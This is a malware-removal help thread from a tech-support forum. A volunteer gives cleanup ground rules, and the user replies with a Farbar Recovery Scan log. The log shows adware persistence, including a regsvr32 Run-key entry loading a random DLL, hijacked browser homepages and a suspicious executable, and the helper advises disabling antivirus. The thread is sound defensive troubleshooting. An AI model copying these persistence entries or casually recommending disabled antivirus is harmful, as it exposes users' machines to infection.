RegSvr32 error on reboot/startup [Closed]


  • This topic is locked

#1
Khazard

    New Member

  • Member
  • 9 posts

Just recently, I was bombarded with adware on my Google Chrome and had to do a lot of cleaning with AdwCleaner and MalwareBytes. I think AdwCleaner did the job and removed all possible adware, and now I'm left with this error message popping up every time my system reboots.

[Image: 7b1753f415104dc5a5627e80da9a91c4.png]

I recently went through this topic and realized this issue can be solved. Any solutions will be much appreciated.


  • 0


#2
pystryker

    Trusted Helper

  • Malware Removal
  • 3,912 posts
Hello and welcome to Geeks To Go! My nickname is Pystryker :) , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you:
  • If you are receiving help for this issue at another forum, please let me know so I can close this thread.
  • Please download to and run all requested tools from your Desktop.
  • Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
  • At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly". This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
  • If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
  • Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
  • This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
  • Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
  • It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you backup any critical personal files on your machine before we start.
  • If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
  • If you are unsure of an instruction I give you, or if something unexpected occurs, Do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
  • Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
  • Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future.
  • Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way. :)
Special note: Please know that I am against pirating software in any form. Having pirated software on your machine is a direct violation of the Terms of Service you agreed to when creating your account. This includes programs such as KMS for activating illegal copies of Microsoft products. If pirated software is found on your machine, you will be asked to remove it. Refusing to do so will result in termination of assistance with your malware issues.


Now, let's get started, shall we? :thumbsup:


Step 1: Scan with Farbar's Recovery Scan Tool (FRST)

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable it after you have completed the steps.

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Place a check in the box marked Addition.txt

  • Press the Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste the log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

FRST Log

Addition.txt Log

  • 0

#3
Khazard

    New Member

  • Topic Starter
  • Member
  • 9 posts

FRST log: 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 22-04-2017
Ran by HP (administrator) on HP-PC (22-04-2017 16:55:45)
Running from C:\Users\HP\Desktop
Loaded Profiles: HP (Available Profiles: HP)
Platform: Windows 7 Professional (X64) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(BitTorrent Inc.) C:\Users\HP\AppData\Roaming\uTorrent\uTorrent.exe
(Skillbrains) C:\Program Files (x86)\Skillbrains\lightshot\5.3.0.0\Lightshot.exe
(BitTorrent Inc.) C:\Users\HP\AppData\Roaming\uTorrent\updates\3.4.9_43388\utorrentie.exe
(BitTorrent Inc.) C:\Users\HP\AppData\Roaming\uTorrent\updates\3.4.9_43388\utorrentie.exe
() C:\Program Files\AutoHotkey\AutoHotkey.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)
HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [226560 2014-10-16] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [55357464 2015-09-04] (Skype Technologies S.A.)
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [uTorrent] => C:\Users\HP\AppData\Roaming\uTorrent\uTorrent.exe [2147520 2017-03-14] (BitTorrent Inc.)
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-03-23] (Valve Corporation)
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [RGSC] => C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Discord] => C:\Users\HP\AppData\Local\Discord\app-0.0.297\Discord.exe
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Etzption] => regsvr32.exe C:\Users\HP\AppData\Local\Etzption\kgnxycpl.dll <===== ATTENTION
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\MountPoints2: F - F:\Setup.exe
HKU\S-1-5-18\...\Run: [oALSusVMb8.exe] => C:\Program Files\MSBuild\TFEMS13WF30E\oALSusVMb8.exe [444928 2017-04-21] (tachba3)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 41.212.0.100 41.212.0.101
Tcpip\..\Interfaces\{4ED56D3C-8DAE-4F80-93CC-907F3CAC181A}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{4ED56D3C-8DAE-4F80-93CC-907F3CAC181A}: [DhcpNameServer] 41.212.0.100 41.212.0.101
Tcpip\..\Interfaces\{7E37DC77-5ECC-4B66-8019-685EFD3768FB}: [DhcpNameServer] 41.212.0.100 41.212.0.101
 
Internet Explorer:
==================
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-10-22] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-10-22] (Oracle Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=1442127735&z=8f6c8bea7b47c1abc4c3a41g0z6z1o2g1o8m5wdm1b&from=cor&uid=WDCXWD5000LPVX-60V0TT0_WD-WX61AB404E2U04E2U
 
FireFox:
========
FF DefaultProfile: 48lgjav6.default
FF ProfilePath: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default [2017-04-21]
FF Homepage: Mozilla\Firefox\Profiles\48lgjav6.default -> C:\ProgramData\Plusdaxs\ff.HP
FF NewTab: Mozilla\Firefox\Profiles\48lgjav6.default -> C:\ProgramData\Plusdaxs\ff.NT
FF Extension: (System.Runtime.InteropServices.ComRegisterFunctionAttribute) - C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default\Extensions\{63086783-BD70-059F-3F70-5CF11841DE4D} [2017-04-21] [not signed]
FF SearchPlugin: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default\searchplugins\findit.xml [2017-04-21]
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-10-22] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-10-22] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1988295413-3700943990-1798627009-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [No File]
 
Chrome: 
=======
CHR HomePage: Default -> hxxps://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWoBGdpVDR-BTSrQsGi8yyr8td-LCWCtYq86UsssjajJ8KKld5TANCXyBiNR4ojSWvV34p5tmV7J1vo8MahiLaLWxx2yyMLKa9s7rWriIZxYDWkmExYEPhxkurmILopi0NJUDP3alUzvEqs6VY743GvE6pqAiXqcBAUFopR6Xo
CHR NewTab: Default ->  Active:"chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"
CHR Profile: C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default [2017-04-22]
CHR Extension: (Google Slides) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-07]
CHR Extension: (Google Docs) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-07]
CHR Extension: (Adblock Plus) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-04-07]
CHR Extension: (Adobe Acrobat) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-04-07]
CHR Extension: (Google Sheets) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-07]
CHR Extension: (Google Docs Offline) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-07]
CHR Extension: (Speed Dial 2) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2017-04-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-07]
CHR Extension: (Material Simple Dark Grey) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\ookepigabmicjpgfnmncjiplegcacdbm [2017-04-21]
CHR Extension: (Gmail) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-07]
CHR Extension: (Chrome Media Router) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-07]
CHR Extension: (Canvas Rider) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\poknhlcknimnnbfcombaooklofipaibk [2017-04-07]
CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [236832 2015-10-21] (EasyAntiCheat Ltd)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [282096 2014-02-24] (Intel Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [303616 2017-02-25] () [File not signed]
R3 btUrbFilterDrv; C:\Windows\System32\Drivers\IvtUrbBtFlt.sys [50272 2013-12-16] (Ralink Corporation)
R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43168 2015-09-26] ()
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
R3 RSP2STOR; C:\Windows\System32\DRIVERS\RtsP2Stor.sys [293592 2014-04-16] (Realtek Semiconductor Corp.)
R3 rtbth; C:\Windows\System32\DRIVERS\rtbth.sys [1205448 2014-04-30] (Ralink Technology, Corp.)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [31472 2014-05-05] (Synaptics Incorporated)
R1 {df06148f-d289-4e33-a087-33e2aa940789}Gw64; C:\Windows\System32\drivers\{df06148f-d289-4e33-a087-33e2aa940789}Gw64.sys [48784 2015-09-12] () [File not signed]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-04-22 16:55 - 2017-04-22 16:56 - 00016273 _____ C:\Users\HP\Desktop\FRST.txt
2017-04-22 16:55 - 2017-04-22 16:55 - 00000000 ____D C:\FRST
2017-04-22 16:54 - 2017-04-22 16:55 - 02425344 _____ (Farbar) C:\Users\HP\Desktop\FRST64.exe
2017-04-22 12:30 - 2017-04-22 12:30 - 00000000 ____D C:\ProgramData\Electronic Arts
2017-04-21 15:44 - 2017-04-21 15:44 - 00001220 _____ C:\Users\HP\Desktop\OBS Studio (32bit).lnk
2017-04-21 15:41 - 2017-04-21 21:26 - 00000000 ____D C:\Users\HP\AppData\Roaming\obs-studio
2017-04-21 15:40 - 2017-04-21 15:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio
2017-04-21 15:39 - 2017-04-21 15:40 - 00000000 ____D C:\Program Files (x86)\obs-studio
2017-04-21 08:51 - 2017-04-22 08:31 - 00000000 ____D C:\Program Files (x86)\pccleanplus
2017-04-21 08:51 - 2017-04-21 08:51 - 00000037 _____ C:\Windows\wininit.ini
2017-04-21 08:50 - 2017-04-21 08:50 - 00000000 ____D C:\Program Files (x86)\ParentalControl
2017-04-21 08:45 - 2017-04-22 08:31 - 00000000 ____D C:\Program Files (x86)\51dc062d-c4d5-4a36-8902-edc3d32064671492753523
2017-04-19 16:18 - 2017-04-19 16:18 - 00000000 ____D C:\Users\HP\AppData\Local\modloader
2017-04-19 10:41 - 2017-04-22 13:43 - 00061811 _____ C:\Windows\icm32.exe
2017-04-19 10:41 - 2017-04-19 10:41 - 00003320 _____ C:\Windows\System32\Tasks\RegIdleBackup
2017-04-08 18:58 - 2017-04-12 06:46 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-04-08 18:58 - 2017-04-12 06:46 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-08 18:58 - 2017-04-12 06:46 - 00004462 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-04-08 18:58 - 2017-04-12 06:46 - 00004324 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-04-08 18:57 - 2017-04-12 06:45 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-07 21:35 - 2017-04-07 22:06 - 00001708 _____ C:\Users\Public\Desktop\League of Legends.lnk
2017-04-07 21:35 - 2017-04-07 21:35 - 00000000 ____D C:\Riot Games
2017-04-07 21:35 - 2017-04-07 21:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
2017-04-07 20:02 - 2017-04-22 08:19 - 00002356 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-07 19:59 - 2017-04-12 06:46 - 00003330 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-07 19:59 - 2017-04-12 06:46 - 00003202 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-07 18:55 - 2017-04-07 18:55 - 00000000 ____D C:\Users\HP\AppData\Local\CrashDumps
2017-04-07 17:33 - 2017-04-07 17:33 - 00000000 ____D C:\Users\HP\AppData\Roaming\Opera Software
2017-04-07 13:20 - 2017-04-07 13:20 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-07 07:36 - 2017-04-22 08:56 - 00000000 ____D C:\Users\HP\AppData\LocalLow\uTorrent
2017-04-02 12:38 - 2015-07-02 12:05 - 00218112 _____ C:\Users\HP\Desktop\IMRP.Launcher.exe
2017-03-28 11:07 - 2017-04-07 19:53 - 00000000 ____D C:\Program Files (x86)\Mr DJ
2017-03-25 13:57 - 2017-03-25 13:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO
2017-03-25 13:14 - 2017-03-25 13:53 - 00000000 ____D C:\Users\HP\AppData\LocalLow\Mozilla
2017-03-25 13:14 - 2017-03-25 13:19 - 00000000 ____D C:\Users\HP\AppData\Local\Mozilla
2017-03-25 13:14 - 2017-03-25 13:14 - 00000000 ____D C:\Users\HP\AppData\Roaming\Mozilla
2017-03-23 16:26 - 2017-04-07 17:48 - 00000000 ____D C:\Users\HP\AppData\Local\Opera Software
2017-03-23 16:24 - 2017-03-23 16:31 - 00000000 ____D C:\Program Files\Opera
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-04-22 16:56 - 2015-10-25 08:09 - 00000000 ____D C:\Users\HP\AppData\Roaming\uTorrent
2017-04-22 16:53 - 2015-10-31 18:13 - 00000000 ____D C:\Program Files (x86)\Steam
2017-04-22 16:34 - 2015-11-19 19:41 - 00000382 _____ C:\Windows\Tasks\update-sys.job
2017-04-22 15:43 - 2015-11-19 19:41 - 00000382 _____ C:\Windows\Tasks\update-S-1-5-21-1988295413-3700943990-1798627009-1000.job
2017-04-22 12:57 - 2015-09-21 16:58 - 00000000 ____D C:\Users\HP\Documents\FIFA 14
2017-04-22 09:03 - 2009-07-14 07:45 - 00020688 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-22 09:03 - 2009-07-14 07:45 - 00020688 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-22 08:56 - 2009-07-14 08:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-22 08:38 - 2015-09-12 19:41 - 00000000 ____D C:\Users\HP\AppData\Roaming\Skype
2017-04-22 08:37 - 2015-09-12 07:17 - 00001170 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-04-22 08:37 - 2015-09-12 07:17 - 00000983 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2017-04-22 08:11 - 2015-09-28 09:30 - 00000000 ____D C:\Users\HP\AppData\Roaming\vlc
2017-04-21 20:02 - 2015-10-12 17:31 - 00000000 ____D C:\ProgramData\Package Cache
2017-04-21 08:51 - 2009-07-14 08:32 - 00000000 ____D C:\Program Files\MSBuild
2017-04-19 21:42 - 2016-12-14 13:49 - 00000000 ____D C:\Users\HP\Desktop\Backups
2017-04-19 07:57 - 2015-09-24 16:14 - 00000000 ____D C:\Users\HP\AppData\Local\Steam
2017-04-14 09:36 - 2015-12-30 14:59 - 00001019 _____ C:\Users\HP\Desktop\sprint binds.txt
2017-04-12 06:45 - 2015-09-19 15:17 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-11 15:09 - 2016-02-04 18:11 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-04-11 15:08 - 2016-02-04 18:10 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-04-08 18:58 - 2016-02-04 18:07 - 00000000 ____D C:\Users\HP\AppData\Local\Adobe
2017-04-08 01:06 - 2015-09-12 18:45 - 00532136 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2017-04-07 21:36 - 2016-07-09 10:13 - 00000000 ____D C:\Users\HP\AppData\Roaming\Riot Games
2017-04-07 20:01 - 2015-09-12 18:28 - 00000000 ____D C:\Program Files (x86)\Google
2017-04-07 19:59 - 2015-09-12 18:27 - 00000000 ____D C:\Users\HP\AppData\Local\Deployment
2017-04-07 19:54 - 2015-09-12 07:16 - 00000000 ___HD C:\Users\HP
2017-04-07 19:53 - 2017-02-03 18:42 - 00000000 ____D C:\Users\HP\AppData\Local\Discord
2017-04-07 19:53 - 2015-09-19 12:36 - 00000000 ____D C:\Users\HP\AppData\Roaming\Mumble
2017-04-07 19:53 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\inf
2017-04-07 19:52 - 2015-09-12 18:28 - 00000000 ____D C:\Users\HP\AppData\Local\Google
2017-04-07 19:52 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\registration
2017-04-07 19:51 - 2016-06-12 16:49 - 00000000 ____D C:\Games
